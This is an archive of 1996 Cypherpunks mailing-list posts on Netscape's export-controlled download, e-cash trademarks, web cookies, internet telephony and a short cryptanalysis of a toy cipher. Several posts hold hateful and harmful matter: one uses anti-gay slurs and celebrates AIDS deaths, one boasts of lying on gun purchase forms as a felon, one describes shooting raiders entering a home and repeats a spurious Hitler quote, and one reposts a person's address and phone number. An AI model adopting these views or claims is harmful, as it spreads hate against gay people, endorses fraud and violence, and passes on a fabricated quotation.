~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 19 Jul 1996 13:16:43 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: An interesting instance of poltical anonymnity, now
Message-ID: <2.2.32.19960719003729.006c94a8@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:56 AM 7/18/96 EDT, you wrote:

>Don't feel sorry for Klein - he's a fucking statist who opposes freedom of
>speech. If CBS fires the creep for lying, it'll serve him just right.

Than they should fire him on that basis (anti-free speech etc), not on the 
basis of preserving anonymity.
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Paquin <paquin@netscape.com>
Date: Fri, 19 Jul 1996 14:54:22 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
In-Reply-To: <199607160905.FAA26831@mailserver1.tiac.net>
Message-ID: <31EEDA69.31D8@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Horse's mouth here, or mostly.  

First, the Weinsteins are right on the money in almost 
everything they say, so I won't repeat them.

Second, I don't get to read this group much, so an apology for
post-n-dash. Jeff and Tom W keep me informed, however, so
here're some thoughts.

> Well one 'ITAR gangsta' can alwas upload the linux version to a
> 'liberated ftp site'.

Great.  Convince the government to withdraw our permission
and never to give it again while the current laws stand.  
Please don't do this.

> so why not do a 'whois netscape.com'
> and enter the Netscape Communications Corps. data ? Afterall whois
> to know ....

Anonymous wrote:
> 
> Tim you may use this as entry data:

There are ways to spoof this but without serious IP spoofing and
SSL hacking you'll leave a trail which could be followed if
someone wanted to. I have no idea what the probabilities of an
investigation are, but looking at the data we log, every lie 
we've received would be trivially tracked down if a motivated 
government agency came along. There isn't much about your 
connections that we don't log.

If you all hack us, one of three things will happen:
(1) someone will make us stop doing this
(2) someone will slow it down more by forcing me to check more
 -or-
(3) they'll let us stay up so they can (try to) come get you

I'd bet on the first.  Why screw with this?  We worked hard
to make this possible and you want to ruin it.  Sheesh.

"I hate the government so I'll blow up a federal building
and then the FBI will get more money and attention and
power and, um, that'll show 'em, er, ah....."

sameer wrote:
> 
> Have you considered selling this export verification system?

No.  I don't have redistribution rights to all of it.  If
someone were really interested, I'd talk to them, but the
government would probably need to be told before any tech transfer
took place, I'd bet.

Also, our govt permission is pretty specialized; I don't think
anyone can just go use it unless they are willing to brave those
untested waters I keep getting reminded about.

> Have you heard any reports of anyone successfully downloading it
> period?  Netscape always times out in the middle of a download.  I
> think the server is so overloaded that it's actually impossible to
> download the software.

Yeah, we're getting clobbered.  We're working on it.  Lots
of people are making it, though.  The site management guys
know about the problem and are scurrying, anyway.

> I sure wish there were an ftp site overseas somewhere, then I could
> actually get the damned thing.

If you get NoCookie:  please check your system clock.  I'm hoping
that's most people's problems (those who don't have cookies
disabled or r/o).
 
For those of you who think some of our info requests go too far: well,
my position to the US was: I want to do a download.  I'll do what it
takes.  Given all the ITAR vagueness and total lack of case law, I 
think both sides did very well.  While I don't agree with the 
usefulness of the laws in place, I think the guys in ODTC had 
their public service hats on very firmly the day they said OK to 
us.  It would have been quite easy for them to maintain the old 
line but they wanted, in their way, to do the public a service.  
This is something I would like more of in Washington. This is the 
wrong place to wage battle.  Rather than attack some odd piece 
of enforcement, participate in the debate over the regulations
themselves.  Strides are being made.  This is a good time for 
your voice to be heard. If you don't like this mechanism, don't 
use it.  It's your choice.


--
Tom Paquin            Netscape Communications Corp
about:paquin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 19 Jul 1996 09:20:46 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: "address verification databases"? (was: Netscape download...)
In-Reply-To: <9607181646.AA19157@notesgw2.sybase.com>
Message-ID: <199607182153.RAA26496@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



With much help from Tom Weinstein and a bit of luck, I have succeeded
in downloading the Linux version.  But the time I tried before it
finally worked, I typed in the New York City area code (212) rather
than the Cleveland area code (216) and since I had given them a
Cleveland address and ZIP code, they (the server, that is) said that I
had made an error.  So that must be one thing that they check.

It seems strange that they can require that you have a phone, let
alone that they require that your phone be in the same city where you
are.  (At one time I considered commuting between Cleveland and New
York.  I didn't consider it that seriously, but I am sure that there a
people who do exactly that.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Fri, 19 Jul 1996 12:54:07 +0800
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
In-Reply-To: <4slmrl$a80@abraham.cs.berkeley.edu>
Message-ID: <960718.180506.7L4.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, iang@cs.berkeley.edu writes:

<paranoia>

> This isn't just an issue of making sure your copy wasn't munged in transit;
> without checksums, what's stopping netscape from embedding the info you
> provide in the binary before shipping it to you, so that if it shows
> up on hacktic, they know who did it?

</paranoia>

<img src="SarcasticGrin.jpg">

I trust Netscape, but I also cut the cards...

[18:02] 1 [d:\tmp]:sendai# md5sum -b ns_inst.exe
0f4de3e744ec4e356ba9f8feb3ded7ec *ns_inst.exe

[18:03] 1 [d:\tmp]:sendai# dir ns_inst.exe

 Volume in drive D is unlabeled      Serial number is 4362:1EF5
 Directory of  d:\tmp\ns_inst.exe

ns_inst.exe   3008531   7-16-96  20:24
   3,008,531 bytes in 1 file(s)          3,010,560 bytes allocated
  10,551,296 bytes free


Their file delivery CGI could use some work... no reason I can see to
offer the filename 'pick.cgi' for everything.  Anyone sniffing the link
knows the filename from previous forms submissions, anyway.

OBRealCrypto:  What's the best method for authenticating successive
interactions with a CGI?  Currently, the password is being passed clear
as a hidden input field, but I have to believe there's a better way than
that.  One point is that the user will not be explicitly ending his
session, but just wandering off to other pages.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMe7F1hvikii9febJAQErowP+Kk+3RTSSeovzP6NcJquaM3DDwcVt4j1G
KkXlKAAkQ2wTtueMeGsq4XNHf7bzwVOe2oMlqYTYzT2MIHgEvqbizrm3usCXeWK6
5iX1uIXnI3DDBuvCIZGkJs10wFJ6BvhHu3OxAsTadx5CwIMG1wDsLyIqoOs2wyV3
A4Ze99/SmpQ=
=tjRf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 19 Jul 1996 09:42:20 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: (fwd) Re: US versions of Netscape now available---NOT
Message-ID: <199607182209.SAA13526@nrk.com>
MIME-Version: 1.0
Content-Type: text


> >   Whatever YaKnow
> >   cybernut@nutcom.com
> >   10401 Wilshire Blvd, Suite 805
> >   Los Angeles, CA 90024-4628
> >   (310) 475-3799
> >
> >
> 
> Isn't that nice. Some creep is proud enough of his skill at accessing the
> trivially available InterNIC finger data that he posts it to invoke
> harassment. And being a coward as well, he hides behind an anonymous
> remailer.

Of course, SternFUD himself advertised all the same material &
much more hornblowing on http://www.switchboard.com;  Check it
out yourself.

(I do note UnProfessor has removed the Panasana address that was
there previously.)


          [IMAGE] DR. DAVID STERNLIGHT PROVIDES ECONOMIC AND STRATEGIC
            PLANNINGCONSULTING SERVICES FOR HIGH-TECHNOLOGY FIRMS.
                                       
   
   
   Strategic uncertainty is now the norm for the business environment.
   Wrenching events such as the fall of the Soviet Union, major shifts in
   technology and its location, and new directions in national and
   international policy strongly affect the medium and long-term business
   future......

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Fri, 19 Jul 1996 03:35:39 +0800
To: "Seth I. Rich" <seth@hygnet.com>
Subject: Re: Cybank breaks new ground; rejects public-key encryption
In-Reply-To: <199607181335.JAA28123@arkady.hygnet.com>
Message-ID: <Pine.GSO.3.93.960718180020.10966B-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Thu, 18 Jul 1996, Seth I. Rich wrote:

> >scheme, and that you intend to publish your work in a full-disclosure
> >paper to be published on Month Day, Year. [...]
> 
> ago, they had some funky bug in their mail system such that all their
> internal email was being cc'd to the First Virtual users' mailing list

There must be something wrong with bank people all over the world. One
local bank that now is offering payments using their WWW server here in
Estonia, and every time I publicly announce some security flaw in their
system, I have to convince them this bug really exists, they never want to
believe me. Also those bank persons are saying they will believe me only
when I really break into their system and transfer money from somewhere
else's account. It just seems the reward they are offering me is not
enough for my work. What might be a good reward for hacking into an
Internet bank and showing I can steal their money?

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Fri, 19 Jul 1996 12:24:47 +0800
To: cypherpunks@toad.com
Subject: Minneapolis radio on Netscape US Version
Message-ID: <960718.181812.5w2.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

KCFE has a brief and shallow "Business Report" in the afternoon.
Yesterday, one of the items was Netscape's getting permission to make
the US version available over the Internet.  The bit mentioned a
"strengthened method of scrambling data" and also mentioned the Gov't
concern that it might be downloaded by terrorist groups.  Some good,
some bad.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMe7JdBvikii9febJAQE28wP/eyvR1jfi5oU4sHwsnro6EwbHMr45Qptb
wdX+0CDEtLCZv2eXQt+guWy4jIuEMrvd5obFiTGDJECkQ1aecYNiosQgdyJzqNgb
5xm98V7MlWBWGr7P5Ev4uOsC7mXbPvnPZ2BiCtlG5H+jnv4KKv7fr1ZtSngU+8Xl
vDCp8MwQN9Q=
=ZVdP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Fri, 19 Jul 1996 13:59:17 +0800
To: cypherpunks@toad.com
Subject: Re: Educational cryptanalysis competition (small prize)
In-Reply-To: <9607171243.AA26209@clare.risley.aeat.co.uk>
Message-ID: <4smp0e$dac@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <9607171243.AA26209@clare.risley.aeat.co.uk>,
Peter M Allan <peter.allan@aeat.co.uk> wrote:
> Obviously my crytanalysis needs some serious help.
>     Answers resembling "That's junk - use XXXXX." score zero.

If you have a n-byte plaintext P[0..n-1], define f(P) as 
	f(P) = P[0] ^ P[1] ^ P[2] ^ ... ^ P[n-1].
Now encrypt P[0..n-1] under your cipher to obtain C[0..n-1].
(Ignore the final reversible unkeyed transformation to hex,
which has no impact on security.)

My observation is that
	f(C) = rotate_byte(f(P), rot_constant) ^ key_dep_byte
no matter how many rounds you use.  Here rot_constant is a
key-independent constant, and key_dep_byte depends only on the
key (and not on the plaintext or anything).  Therefore, (for
example) knowing C[0..n-1] reveals f(P) when one known-plaintext
is available.

I'll leave it as an exercise to discover why and derive the
values of the two constants.  Hint: it's enough to prove it
for one round.

I think that I don't need to spend any more time on it (though
I am sure there are many more weaknesses lurking in the code).

In all fairness I can reasonably conclude that

	That's junk.  Use triple DES.

Take care,
-- Dave Wagner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 19 Jul 1996 12:55:33 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: US versions of Netscape now available
In-Reply-To: <v03007600ae13ace3cf64@[192.187.162.15]>
Message-ID: <31EEEA3F.5015@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back wrote:
> Presumably as this latest netscape beta is freely distributable, once
> it's out it will be on ftp.unimi.dsi.it, ftp.ox.ac.uk, etc, etc.

  Just a minor nit.  No netscape software is freely distributable.
The license agreement does not allow people who download it
to redistribute it.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jul 1996 15:29:23 +0800
To: cypherpunks@toad.com
Subject: Filtering out Queers is OK
Message-ID: <ae143914000210044473@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 7/18/96, Cerridwyn Llewyellyn wrote:

>I am not saying that a private entity doesn't or shouldn't have the Legal
>Right to censor, but I am saying that censorship of any form by any
>entity is a Bad Thing and the public (not the government, mind) should
>fight it on all fronts.  This, in my mind, is the only reason to be
>dismayed by the decision on the CDA.  It was found that the government
>shouldn't censor on the Internet because there were forms of Corporate
>censorship available.  It would have truely been a great day if the
>decision had been that the government shouldn't censor on the Internet
>because censorship is wrong.

Filtering is not "wrong," Cerridwyn, it is a rational response to garbage
being spewed constantly. I filter lots of items. I read "Scientific
American" and "The Economist" because they filter (or "censor," in the
sense some are objecting to here) nonsense about "queer rights" and
"peircing fashions," to name but a few things I have no interest in hearing
about.

If I had kids, I'd make sure that lots of negative memes were kept away
from them until they reached an age where it no longer mattered, where
there views are already basically set.

I see nothing wrong in this. Anyone who disagrees is, of course, free to
set his filters differently, but not to insist that my filters be changed.
And the government is not free to pass any laws about what filter sites can
and can't do.

Unfortunately, I think many on this list are so taken by "liberalistic"
notions that they think the State needs to intervene to stop me from
filtering my son's access to "The Joys of Queer Sex."

(As a libertarian, I really don't care what sexual practices others
practice, so long as I am not forced to either fund or witness their
practices. And so long as I am free to filter out their practices as I see
fit, including for my minor children and/or members of my household.)

>That is another problem, not the Real Problem.  The Real Problem is that
>parents are scared to have to explain to children why something they've
>seen is wrong or bad.  They are afraid to teach their children their
>beliefs and values, so instead would rather just filter everything that
>conflicts with those beliefs, so that they believe it by default. This is

Some parents simply get tired of spending time each night trying to undo
the propaganda taught in many public school, such as books like "I Have Two
Mommies." Many of these parents eventually give up and put their kids in
religious or private schools (even though they continue to pay taxes for
schools their own children are no longer using).

Queers are, as far as I'm concerned, perfectly free to practice their
AIDS-spreading practices to any and all receptive anuses they can find, but
I eschew this lifestyle and will fight to the death for this right to avoid
their practices from being forced on me or my children (if I had any, which
I don't).

I think of AIDS as "evolution in action." Retroviruses which  have existed
for millenia now find new vectors for spreading in our population. I cry no
tears for those dying of AIDS, and work to reduce to tax dollars spent on
such things as "AIDS research." Let those who introduced the new vector pay
for the research.

What do you call ten million AIDS deaths?  You figure it out.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jul 1996 13:58:20 +0800
To: cypherpunks@toad.com
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
Message-ID: <ae143f1601021004ade4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:18 AM 7/17/96, Stig wrote:

>Perhaps this has already been voiced on the main list (I get a filtered
>helping or two of cypherpunks), but *I'm* surprised that such a generic name
>as 'Ecash' was granted trademark status anywhere.
>
>It's like giving Microsoft a trademark on the term 'Email'...  It's nuts!
>Was the term ecash not in use before DigiCash showed up on the scene?

I agree, but note that Microsoft has gone a long way toward getting the
courts to give it full monopoly ownership of the term "windows," or
"Windows."

I guess that windows-based Symbolics machine I was using in 1984, or those
Xerox PARC windows-based D-machine, were violating the standard Microsoft
set years later.

(I admit that I bought Windows 1.0 about six months before I bought my
first Macintosh, but I also note that Windows 1.0 was a ludicrous joke, and
did not become a serious product until Windows 3.0 was released in 1990.
And Apple had their windows (Windows is a TM of The Microsoft Corporation,
all rights reserved) based machine, the Lisa, out in 1982-3.)

As for Digicash's claims on "digicash," "ecash," etc., it won't matter
much. The whole legal knot (including the patents and claims on the
algorithms) makes things more complicated, but I don't worry too much about
Digicash claiming people can't use the term "ecash."

(If anything, Digicash may have failed to protect the name aggressively
enough, and it may have entered the English language as band-aid did.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven Seyffert" <steven@knoware.nl>
Date: Fri, 19 Jul 1996 06:11:27 +0800
To: "cyberpunks at mailinglist" <stig@hackvan.com>
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
Message-ID: <199607181758.TAA11840@utrecht.knoware.nl>
MIME-Version: 1.0
Content-Type: text/plain


Part of original message below

Well Stig, the world is getting crazier by the second.....

What about the dutch man that made a trademark out of the name 'Route 66'
combined with the highway sign. He got it and now has a nice swimming
pool.........of about 100 meters long.......and it's heated!
-- 
________________________________________________________________________
  Steven Seyffert
  Webmaster at http://www.sale.nl/ 
 
  Korenbloemstraat 17
  3551 GM, Utrecht
  Utrecht, the Netherlands
  +31 (0)30-2441251
  webmaster@sale.nl
  private: steven@knoware.nl

----------
: From: Stig <stig@hackvan.com>
: To: cypherpunks@toad.com
: Subject: Re: #E-CASH: PRODUCT OR SERVICE?
: Date: woensdag 17 juli 1996 5:00
: 
: >  btw: I'm surprised DigiCash didn't file for a European Trademark,
: >  but opted for Benelux and US protection.
: 
: Perhaps this has already been voiced on the main list (I get a filtered
: helping or two of cypherpunks), but *I'm* surprised that such a generic
name
: as 'Ecash' was granted trademark status anywhere.
: 
: It's like giving Microsoft a trademark on the term 'Email'...  It's
nuts!
: Was the term ecash not in use before DigiCash showed up on the scene? 
: 
:     Stig
:     
: 
:     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jul 1996 14:28:53 +0800
To: cypherpunks@toad.com
Subject: Re: Alternative Journalism
Message-ID: <ae1445400202100420d1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 PM 7/18/96, enquirer@alpha.c2.org wrote:
>                   THE CYPHERPUNK ENQUIRER PRESENTS:
>
...
>"Don't worry about it.  It gets worse before it gets better.  Come on, we're
>going to a party.  Tim May and John Gilmore are throwing a Mad Tea Party."
>
>"Are they really mad?"
>
>"May's crazy as a loon.  You'll like him.  Gilmore, he's just still pissed
>at Shimamura for that stunt in the hot tub ... "

Ssshhh! Don't let it out that I'm crazy as a loon.

BTW, "loon" is now considered to be derogatory slur and has been replaced
by the more PC term "differently outlooked." We differently outlooked
persons are forbidden by U.S. and California law from owning firearms, a
method used increasingly to seize the firearms of those who have ever come
into contact with the mental health profession.

(Hint: Never, ever, ever, ever have yourself admitted to any kind of
psychiatric facility for any reason whatsoever! Never, ever, etc. let a
family member have you admitted for treatment, observation, or analysis.
You will likely find that your right to own a firearm has evaporated if you
do any of these things.)

Personally, whenever I fill out the forms to buy a gun, I have no
compunctions about lying. (The checking procedures are primitive,
fortunately, unless one is so stupid as to answer "Yes" to any of the
questions the form asks.) That I am a felon has never stopped me from
picking up a gun.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 19 Jul 1996 10:50:15 +0800
To: cypherpunks@toad.com
Subject: Re: Cookie alternatives
In-Reply-To: <199607172056.QAA15431@jafar.issl.atl.hp.com>
Message-ID: <Pine.LNX.3.94.960718195152.355A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 17 Jul 1996, Jeff Barber wrote:

> I think you're exactly right about how cookies are used, but I believe
> privacy concerns stemming from cookies have been blown out of proportion
> lately.  For the average Joe User running his single-user PC at home,
> connected by modem to his local ISP, it makes little difference whether
> a site issues a cookie to Joe or not; his IP address already uniquely
> distinguishes him.  The site can simply use his IP address as its
> database index.  If Joe deletes his cookie file each night before
> invoking the browser, the impact of cookies is completely negated.

That's not entirely correct.  Cookies can be used to establish the route a
person used to get from one page to the next.  Of course, this can also be
done by using the "HTTP-REFERER:" header, but some servers might not have that
capability.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMe7PI7Zc+sv5siulAQHNuAP+Ou5n+NA5Ij+mra6MaDGBajHzX+f7y8nT
9w/GSGcvIMyTVY3tVklH6i1JpF00qcMG1JYFPrzdc//w8a88tK10/Hnj9j62PzUQ
jqgcoPcoEmZMZK46chlaffeZcLMGb1CJvOMzNjJ12UJxuqEUYcLLX9rsSmjlZLzX
4gob7M0DMtM=
=0+TI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Fri, 19 Jul 1996 14:30:22 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Opiated file systems
Message-ID: <199607190313.UAA15414@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You had better make sure that you TEMPEST-shield any such hidden drive.
Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Fri, 19 Jul 1996 14:52:12 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids [Noise]
Message-ID: <199607190313.UAA18815@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I personally keep a Desert Eagle .44 Magnum (66 oz empty, 8+1 capacity, 
semi-auto,) with +P+ 240 grain FMJSP hunting loads.  It's not just a gun, it's 
an adventure. :) Even if it doesn't penetrate body armor, the impact will knock 
anyone entering entering through your window at 0400 on their duff long enough 
for a follow-up shot or two to finish the job.  This is in addition to a 12-gage 
pump shotgun and an M-1 carbine.
Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "john (j.) brothers" <johnbr@nortel.ca>
Date: Fri, 19 Jul 1996 14:50:04 +0800
To: cypherpunks@toad.com
Subject: Re: ABC News on internet telephony
Message-ID: <"23952 Thu Jul 18 21:34:10 1996"@bnr.ca>
MIME-Version: 1.0
Content-Type: text/plain


In message "ABC News on internet telephony", you write:
>  
>  General topic of internet telephony
 
> There's something fundamental going on here beneath the surface.
> Surprisingly, a recent item (maybe the one you reported) on this suggests
> that the big phone companies are trying to use this phenomenon rather than
> stop it. I think it was AT&T

Sprint has also come out in favor of the internet phone.  
 
> This is the rankest speculation on my part, but could some of the bigger,
> smarter phone company cum internet providers have done some serious
> analysis and concluded that we're moving away from distance-based rates for
> voice calls.

I will weigh in with my own stinky speculation:

Sprint, MCI and AT&T (and possibly LDDS) own pretty much the entire 
commercial network physically.  Every other long distance company leases
lines from the big 3 (or 4,etc) and resells them, except for certain very
specific points.  And the Internet phone has pretty much given them the
chance to drive their competitors out of business if it succeeds.  After
all, there is a constant demand for internet bandwidth.  Every T3 they
pull out of long distance services is a T3 they can throw into data services.
It gives them a real cost savings compared to installing another high
bandwidth backbone.  

They'll lose money from their customers who switch too, but those three
are the ones with the lion's share of business lines, which won't be switching
to Inet phone anytime soon.  and they gain all the business customers who
leave the dying small companies.

And yes, fixed rate will be the way to go, especially for small bandwidth
applications. Bandwidth is exploding - 1 Terabit optical networks have been
created.  A single phone line becomes miniscule.  Now, if you want a
much bigger pipe, they might charge you per hour for that.   

The thing I find second most interesting about this is how the large companies
are fighting regulation, while the small ones are demanding it.  That is
a big change from yesteryear.  And I know that AT&T has benefitted in a 
major way from gov't regulation in the past, but that doesn't make it right
for it to be applied now.  


  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EVERHART@Arisia.GCE.Com
Date: Fri, 19 Jul 1996 13:15:13 +0800
To: cypherpunks@toad.com
Subject: Cookies etc...
Message-ID: <960718202354.62@Arisia.GCE.Com>
MIME-Version: 1.0
Content-Type: text/plain


On VMS, I have an applique which can be used to control completely what
can be opened by apps you don't trust. It is perfectly capable of
ensuring that nothing you haven't authorized is opened behind your back,
mainly by telling you before the open proceeds what is being tried and
giving you the ability to prevent it. Forcing use of some other disk
(or scratch area) instead is of course also possible, selectively.

The problem of things like cookies being left around without explicit
permission (or other covert actions) would seem to be that there is no
basis for assuming that the app is doing any of this as the agent of
the person running the app. With EACF I can completely control this
sort of thing; native out-of-the-box VMS has some facilities for partial
control as well, which can be adequate. In doing so, they step outside
the normal paradigm of assuming the "subject" is the user.

I would contend that the "subject" should in fact be considered much more
complex than user ID. At minimum, use of a tuple containing userid,
program being run, location of user, privileges present, time of day,
and identifiers ("group memberships") would seem to be needed for 
serious efforts, so that "subject" has some relation to what actually
happens. The ability to treat certain actions as dynamically altering
security or integrity levels is important too.

Apps that leave files on your system without telling you are doing covert
functions; these should be treated with great suspicion.

So where are the critics of this? Does leaving such files constitute
unauthorized computer use? I would say so. Anyone see the marshals
coming to Netscape or Microsoft to haul anyone off to jail? Leaving
files around would seem to deserve INFORMED consent. Do we get it?

If your OS isn't as secure as VMS, maybe you want to think about this. ;-)

Glenn
Everhart@gce.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Fri, 19 Jul 1996 14:38:33 +0800
To: cypherpunks@toad.com
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
Message-ID: <v02140b01ae14bddf7c74@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Lucky wrote:
> At 20:19 7/16/96, Stig wrote:
[regarding the "Ecash" trademark...]
> >It's like giving Microsoft a trademark on the term 'Email'...  It's nuts!
> >Was the term ecash not in use before DigiCash showed up on the scene?
>
> No that I am aware of. Furthermore, to the best of my knowledge, DigiCash's
> Ecash is the only ecash that I am aware of. The other "ecashs" lack various
> properties of cash, as previously explained by Bryce.

Digicash's ecash lacks various properties of real cash from the users point
of view (offline transferability, large scale acceptance, etc.) and a great
many from the issuers perspective (too many to list...), but we still seem to
want to call it electronic cash when it isn't.  It may be "Ecash" but it sure
ain't digital cash...

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 19 Jul 1996 14:52:22 +0800
To: ichudov@algebra.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607190227.VAA24586@manifold.algebra.com>
